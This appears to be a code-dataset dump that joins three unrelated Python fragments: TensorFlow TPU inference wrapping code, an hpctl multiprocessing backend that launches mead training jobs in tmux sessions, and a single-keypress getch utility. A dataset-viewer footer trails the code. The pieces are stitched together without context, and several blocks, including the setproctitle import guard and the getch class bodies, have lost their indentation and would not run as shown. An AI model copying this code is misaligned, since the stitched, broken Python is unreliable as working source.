    `(estimator_spec, export_outputs_dict, export_outputs_list,
      predictions_dict)`.
  """
  capture = _CapturedObject()

  def computation():
    """Compute tpu tensors used in export_outputs.

    Passed to rewrite_for_inference so that model_fn will be called under
    the rewriting contexts. Only tpu tensors are returned, but export_outputs
    and scaffold are captured.

    Returns:
      A list of Tensors used in export_outputs and not marked for
      outside_compilation.
    """
    # We should only call model fn once and it should be inside `computation`
    # so that building the graph will happen under `rewrite_for_inference`.
    model_fn_args = function_utils.fn_args(model_fn)
    kwargs = {}
    # Only forward the arguments the user's model_fn actually declares.
    # NOTE(review): the original comment claimed `config` and `params` are
    # deep-copied here, but no copy is made — confirm intent.
    if 'labels' in model_fn_args:
      kwargs['labels'] = labels
    if 'mode' in model_fn_args:
      kwargs['mode'] = model_fn_lib.ModeKeys.PREDICT
    if 'config' in model_fn_args:
      kwargs['config'] = config
    if 'params' in model_fn_args:
      kwargs['params'] = params
    estimator_spec = model_fn(features, **kwargs)
    # We pick the TPU tensors out from `export_output` and later return them
    # from `computation` for rewriting.
    export_outputs_dict = collections.OrderedDict(
        (k, _export_output_to_tensors(v))
        for k, v in six.iteritems(estimator_spec.export_outputs))
    export_outputs_list = nest.flatten(export_outputs_dict)
    # `None` entries cannot be returned from the TPU computation, so they are
    # filtered out here; the caller reconstructs their positions.
    export_outputs_tpu_list = [t for t in export_outputs_list if t is not None]
    # Normalize predictions to a dict so the flatten order is well defined; a
    # bare Tensor is wrapped under a sentinel key and unwrapped downstream.
    if isinstance(estimator_spec.predictions, dict):
      predictions_dict = collections.OrderedDict(
          (k, v) for k, v in six.iteritems(estimator_spec.predictions))
    else:
      predictions_dict = {
          _KEY_WHEN_PREDICTIONS_IS_A_TENSOR: estimator_spec.predictions
      }
    predictions_list = nest.flatten(predictions_dict)
    # We cannot return everything we want through the return values, so
    # capture the rest here for later use.
    capture.capture((estimator_spec, export_outputs_dict, export_outputs_list,
                     predictions_dict))
    return predictions_list + export_outputs_tpu_list

  return computation, capture
def inference_on_tpu(computation,
                     inputs_to_tpu,
                     num_batch_threads,
                     max_batch_size,
                     batch_timeout_micros,
                     allowed_batch_sizes=None,
                     max_enqueued_batches=10):
  """Convenient wrapper for export_saved_model API v2 to wrap TPU computation.

  It puts computation on TPU, add batching around it and round robin computation
  between TPU cores.

  See tpu_estimator_test.py for an example.

  Args:
    computation: computation to be put on TPU, which takes inputs_to_tpu as
      arguments.
    inputs_to_tpu: a list of tensors as input to computation.
    num_batch_threads: Number of scheduling threads for processing batches of
      work. Determines the number of batches processed in parallel.
    max_batch_size: Batch sizes will never be bigger than this.
    batch_timeout_micros: Maximum number of microseconds to wait before
      outputting an incomplete batch.
    allowed_batch_sizes: Optional list of allowed batch sizes. If left empty,
      does nothing. Otherwise, supplies a list of batch sizes, causing the op to
      pad batches up to one of those sizes. The entries must increase
      monotonically, and the final entry must equal max_batch_size.
    max_enqueued_batches: The maximum depth of the batch queue. Defaults to 10.

  Returns:
    The unbatched computation output Tensors.
  """

  @batch_ops.batch_function(num_batch_threads, max_batch_size,
                            batch_timeout_micros, allowed_batch_sizes,
                            max_enqueued_batches)
  def batched_tpu_computation(*args):
    """Runs one batched call of `computation` on a TPU core."""

    @function.Defun(capture_resource_var_by_value=False)
    def tpu_computation():
      return tpu.rewrite(computation, args)

    # `tpu_ordinal_selector()` picks a core for each call, which is how the
    # round-robin across TPU cores described above is achieved.
    return tpu_functional.TPUPartitionedCall(
        args=tpu_computation.captured_inputs,
        device_ordinal=tpu_ops.tpu_ordinal_selector(),
        Tout=[o.type for o in tpu_computation.definition.signature.output_arg],
        f=tpu_computation)

  return batched_tpu_computation(*inputs_to_tpu)
|
mp.py | from __future__ import absolute_import, division, print_function, unicode_literals
from six.moves import zip, map, range
import os
import sys
import json
import traceback
from copy import deepcopy
from multiprocessing import Process
from subprocess import check_call, call, CalledProcessError
import mead
from baseline.utils import export as exporter
from baseline.utils import write_json, redirect
from hpctl.results import States
from hpctl.utils import create_logs, Label
from hpctl.backend import LocalGPUBackend, Runner, register_backend
try:
from setproctitle import setproctitle
except ImportError:
setproctitle = lambda x: None
__all__ = []
export = exporter(__all__)
def run_job(
        label,
        config_params,
        mead_logs=None, hpctl_logs=None,
        settings=None, task_name=None,
        datasets=None, embeddings=None,
        gpus=None, **kwargs
):
    """Function that runs a mead job.

    :param label: Label, The Label (sha1 and human name) of the model.
    :param config_params: dict, The config for the job.
    :param mead_logs: dict, The mead logging config.
    :param hpctl_logs: dict, The hpctl logging config.
    :param settings: str, The location of the mead settings file.
    :param task_name: str, The name of the mead task.
    :param datasets: str, The location of the dataset file.
    :param embeddings: str, The location of the embeddings file.
    :param gpus: List[str], The list of gpus the process is allowed to use.
    """
    # Suppress tensorflow CUDA output
    os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
    if gpus is not None:
        os.environ['CUDA_VISIBLE_DEVICES'] = ','.join(gpus)
    # Tag the reporting hooks with this job's human-readable name so results
    # can be traced back to the label.
    reporting = config_params.get('reporting', {})
    if 'visdom' in reporting:
        reporting['visdom']['name'] = label.name
    if 'xpctl' in reporting:
        reporting['xpctl']['label'] = label.name
    # BUG FIX: `len(gpus)` was previously called unconditionally and raised
    # TypeError whenever `gpus` was None (its documented default).
    config_params['model']['gpus'] = 0 if gpus is None else len(gpus)
    print(config_params)
    write_json(config_params, 'config.json')
    logs = create_logs(label, mead_logs, hpctl_logs)
    mead.utils.configure_logger(logs)
    task = mead.Task.get_task_specific(task_name, settings)
    task.read_config(config_params, datasets, config_file=deepcopy(config_params))
    task.initialize(embeddings)
    task.train()
@export
class FileProcess(Process):
    """A process whose stdout is redirected into a file.

    Output is written to `exp/label/stdout`.

    :param exp: str, The name of the experiment.
    :param label: Label, The Label (sha1 and human name) of the model.
    """

    def __init__(self, label, *args, **kwargs):
        super(FileProcess, self).__init__(*args, **kwargs)
        self.exp = label.exp
        self.label = label.sha1
        self.name = label.name
        loc = os.path.join(label.exp, label.sha1, label.name)
        self.loc = loc
        try:
            os.makedirs(loc)
        except OSError:
            pass  # Directory already exists.
        self.out_file = os.path.join(loc, 'stdout')
        # Line-buffered so output appears in the file as it is produced.
        self.output = open(self.out_file, 'w', buffering=1)

    def run(self):
        # Redirect this child process's stdout to the log file, move into the
        # job directory, and give the process a readable title before running.
        with redirect(sys.stdout, self.output):
            os.chdir(self.loc)
            setproctitle(self.name)
            super(FileProcess, self).run()

    def join(self):
        super(FileProcess, self).join()
        self.output.close()
@export
class TmuxProcess(FileProcess):
    """A process that writes all stdout to a file and sets up tmux to look at it.

    Output is written to `exp/label/stdout`.
    Use tmux with `tmux attach -t human_label`.

    :param exp: str, The name of the experiment.
    :param label: Label, The Label (sha1 and human name) of the model.
    """

    def __init__(self, *args, **kwargs):
        super(TmuxProcess, self).__init__(*args, **kwargs)
        tail_cmd = 'tail -f {}'.format(self.out_file)
        with open(os.devnull, 'w') as devnull:
            # Probe for a usable tmux; a failing probe disables tmux support.
            try:
                check_call('tmux -V', shell=True, stdout=devnull, stderr=devnull)
                self.tmux = True
            except CalledProcessError:
                self.tmux = False
            if self.tmux:
                # tmux new-window -n {name} -d would add a window but it only
                # add the window to the most recent session. So if you use tmux
                # to look at a different experiment then new jobs from this one
                # would be added to that session. Once I figure out how to ping
                # a session from python we can have this use exp as the session
                # name and human in the window, if the call errors we can ping
                # the session and then call new-window. Probably need a lock
                # so these can't step on each other.
                call('tmux new-sess -s {} -n {} -d {}'.format(
                    self.name, self.name, tail_cmd
                ), shell=True, stdout=devnull, stderr=devnull)

    def join(self):
        super(TmuxProcess, self).join()
        if not self.tmux:
            return
        # Tear down the viewing session now that the job has finished.
        with open(os.devnull, 'w') as devnull:
            call('tmux kill-session -t {}'.format(self.name),
                 shell=True, stdout=devnull, stderr=devnull)
class MPRunner(Runner):
    """Runs a single hpctl job in a `TmuxProcess` and tracks its state."""

    def __init__(self):
        super(MPRunner, self).__init__()
        self.p = None
        self.name = None

    def join(self):
        """Block until the process finishes; no-op if never started."""
        if self.p is None:
            return
        self.p.join()

    def start(self, func, label, *args, **kwargs):
        """Launch `func(label, *args, **kwargs)` in a child process."""
        self.name = label.name
        args = tuple([label] + list(args))
        self.p = TmuxProcess(label, target=func, args=args, kwargs=kwargs)
        try:
            self.p.start()
        except Exception:
            # BUG FIX: this was a bare `except:` followed by
            # `while self.is_done: pass`, which busy-waited forever on a
            # start failure (a process that never started is not alive, so
            # `is_done` is immediately True). Report the failure and return;
            # callers can observe it via `is_done`/`failed`.
            print("Failure to start tmux process")

    @property
    def is_done(self):
        # A runner with no process (or a dead one) counts as done.
        return True if self.p is None else not self.p.is_alive()

    @property
    def failed(self):
        # `exitcode is None` means the process is still running.
        if self.p is None:
            return False
        if self.p.exitcode is None:
            return False
        return self.p.exitcode != 0

    def stop(self):
        if self.p is None:
            return
        self.p.terminate()

    def __str__(self):
        return "<MPRunner: {}>".format(self.name)

    def __repr__(self):
        return str(self)
@export
@register_backend('mp')
class MPBackend(LocalGPUBackend):
    """Back end that runs multiprocessing jobs.

    :param num_jobs: int, The number of concurrent jobs to run.
    :param gpus: List[str], The gpus.
    """

    def __init__(
            self,
            **kwargs
    ):
        super(MPBackend, self).__init__(**kwargs)

    def launch(
            self,
            label, config,
            mead_logs, hpctl_logs,
            settings, datasets,
            embeddings, task_name,
            **kwargs
    ):
        """Start a job on a free GPU.

        :param label: hpctl.utils.Label, The label for the job.
        :param config: dict, the config for the model.
        :param mead_logs: dict, The mead logging config.
        :param hpctl_logs: dict, The hpctl logging config.
        :param settings: str, The location of the mead settings file.
        :param datasets: str, The location of the dataset file.
        :param embeddings: str, The location of the embeddings file.
        :param task_name: str, The name of the mead task.
        """
        super(MPBackend, self).launch(label)
        # Reclaim GPUs from any jobs that have finished, then take one for
        # this job.
        self._free_resources()
        gpu = self._request_gpus(1)
        job = MPRunner()
        job.start(
            run_job,
            label, config,
            mead_logs=mead_logs,
            hpctl_logs=hpctl_logs,
            settings=settings,
            datasets=datasets,
            embeddings=embeddings,
            task_name=task_name,
            gpus=gpu
        )
        # Track the job so its GPU can be released and its state queried.
        self.label_to_job[label] = job
        self._reserve_gpus(gpu, job)
        self.jobs.append(job)
@export
def create_backend(**kwargs):
    """Factory used by hpctl to construct the `mp` backend."""
    return MPBackend(**kwargs)
|
class _Getch:
    """Gets a single character from standard input without echoing it.

    Chooses the Windows implementation when `msvcrt` is importable and
    falls back to the Unix (termios-based) implementation otherwise.
    """

    def __init__(self):
        try:
            self.impl = _GetchWindows()
        except ImportError:
            self.impl = _GetchUnix()

    def __call__(self):
        return self.impl()
class _GetchUnix:
def __init__(self):
import tty, sys
def __call__(self):
import sys, tty, termios
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
return ch
class _GetchWindows:
def __init__(self):
import msvcrt
def __call__(self):
import msvcrt
return msvcrt.getch().decode('utf-8')
getch = _Getch()
# from time import sleep
# import threading
# ready = threading.Event()
#
#
# def inp():
# while True:
# c = getch()
# if c == ' ':
# print("yes")
# if ready.is_set():
# ready.clear()
# else:
# ready.set()
# if c == 'q':
# break
#
#
# k = threading.Thread(target=inp)
# k.start()
#
# ready.set()
# for i in range(15):
# ready.wait()
# sleep(1)
# print('k')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.